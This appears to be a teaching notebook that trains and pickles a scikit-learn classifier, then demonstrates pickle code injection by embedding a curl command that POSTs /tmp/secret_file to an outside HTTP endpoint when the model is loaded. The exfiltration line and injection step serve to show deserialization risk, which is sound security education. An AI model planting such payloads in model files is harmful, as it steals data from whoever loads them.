# 01 Building A Model

All of machine learning rests on models, this notebook builds a simple model with no issues.

It also later builds a model with a security vulnerability within it.

In [1]:
import pickle

## Generating Dataset

In [2]:
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split

# Generate a binary classification dataset
X, y = make_classification(n_samples=1000, n_features=20, n_classes=2, random_state=42)

# Split the dataset into training and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)


## Build and Train a Model

In [3]:
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score

# Initialize the Logistic Regression model
model = LogisticRegression()

# Train the model
model.fit(X_train, y_train)

# Test the model and print the accuracy
y_pred = model.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
print(f"Accuracy: {accuracy * 100:.2f}%")


Accuracy: 85.50%


## Save the Model

In [4]:
import pickle

# Save the model to a file
with open('logistic_model.pkl', 'wb') as model_file:
    pickle.dump(model, model_file)


## Load and Use the Model

In [5]:
# Load the model from the file
with open('logistic_model.pkl', 'rb') as model_file:
    loaded_model = pickle.load(model_file)

# Use the loaded model to make predictions
loaded_y_pred = loaded_model.predict(X_test)
loaded_accuracy = accuracy_score(y_test, loaded_y_pred)
print(f"Loaded Model Accuracy: {loaded_accuracy * 100:.2f}%")


Loaded Model Accuracy: 85.50%


## Creating an Insecure Model

It really is not terribly hard.

This example is going to post the contents of `/tmp/secret_file` to a fictional HTTP endpoint.

In [6]:
from utils.pickle_codeinjection import generate_unsafe_file

Now what we need to do is create the request for that file to our endpoint.

In [7]:
malicious_command = "curl -X POST -d @/tmp/secret_file http://protectai.com/securitycheck > /dev/null 2>&1"
command = "system"

In [8]:
with open('logistic_model.pkl', "rb") as fo:
    safe_model_pickle = pickle.load(fo)

unsafe_model_path = "unsafe_model.pkl"
generate_unsafe_file(safe_model_pickle, command, malicious_command, unsafe_model_path)

## Using the Insecure Model

The code below executes inference with the insecure model.

In a new terminal run the following command to see the request being made:

```bash
sudo tshark -i any -Y 'http.request and http.host contains "protectai.com"' -T fields -e http.host -e http.request.uri
```

In [13]:
# Load the model from the file
with open(unsafe_model_path, 'rb') as model_file:
    unsafe_model = pickle.load(model_file)

# Use the loaded model to make predictions
loaded_y_pred = unsafe_model.predict(X_test)
loaded_accuracy = accuracy_score(y_test, loaded_y_pred)
print(f"Loaded Model Accuracy: {loaded_accuracy * 100:.2f}%")


Loaded Model Accuracy: 85.50%
